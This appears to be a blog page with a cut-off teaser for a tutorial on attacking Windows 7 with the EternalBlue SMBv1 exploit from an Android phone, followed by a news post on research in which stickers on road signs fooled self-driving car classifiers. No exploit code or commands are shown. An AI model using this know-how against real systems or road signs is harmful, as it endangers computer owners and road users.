Attacking Windows Platform with EternalBlue Exploit via Android Phones | MS17-010

Image
Introduction On 14 April 2017, a hacker group know by the name of Shadow Brokers leaked exploitation toolkit used by the National Security Agency (NSA). The leak was also used as part of a worldwide WannaCry ransomware attack. EternalBlue is also an exploit developed and used by the NSA according to former NSA employees. Lab Environment Target Machine: Windows 7 Ultimate x64 bit Attacker Machine: Android 5.1  What is EternalBlue EternalBlue actually exploits a vulnerability found in Server Message Block (SMB) protocol of Microsoft Windows various platforms. This vulnerability can be found under CVE-2017-0144 in the CVE catalog.The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server. Windows 7 Operating with Release Effected by EternalBlue Installing Metasploit Framework on Android Step 1: Download Termux from play store....

Self-driving Cars Can be hacked by just putting stickers on street signs

Self-driving Cars Can be hacked by just putting stickers on street signs :--

Car Hacking is a hot topic, though it's not new for researchers to hack cars. Previously they had demonstrated how to hijack a car remotely, how to disables cars crucial functions like airbags, and even how to steal cars.

But the latest car hacking trick doesn't require any extra ordinary skills to accomplished. All it takes is a simple sticker onto a sign board to confuse any self-driving car and cause accident.

Isn't this so dangerous?

A team of researchers from the University of Washington demonstrated how anyone could print stickers off at home and put them on a few road signs to convince "most" autonomous cars into misidentifying road signs and cause accidents.

According to the researchers, image recognition system used by most autonomous cars fails to read road sign boards if they are altered by placing stickers or posters over part or the whole road sign board.

In a research papers, titled "Robust Physical-World Attacks on Machine Learning Models," the researchers demonstrated several ways to disrupt the way autonomous cars read and classify road signs using just a colour printer and a camera.
By simply adding "Love" and "Hate" graphics onto a "STOP" sign  the researchers were able to trick the autonomous car’s image-detecting algorithms into thinking it was just a Speed Limit 45 sign in 100 percent of test cases.

The researchers also performed the same exact test on a RIGHT TURN sign and found that the cars wrongly classified it as a STOP sign two-thirds of the time.

The researchers did not stop there. They also applied smaller stickers onto a STOP sign to camouflage the visual disturbances and the car identified it as a street art in 100 percent of the time.
 Evtimov, Kevin Eykholt, Earlence Fernandes, Tadayoshi Kohno, Bo Li, Atul Prakash, Amir Rahmati, and Dawn Song.


Although the researchers did not reveal the manufacturer whose self-driving car they used in their experiments, threats to self-driving cars have once again made us all think of having one in future.

Comments

Popular posts from this blog

Attacking Windows Platform with EternalBlue Exploit via Android Phones | MS17-010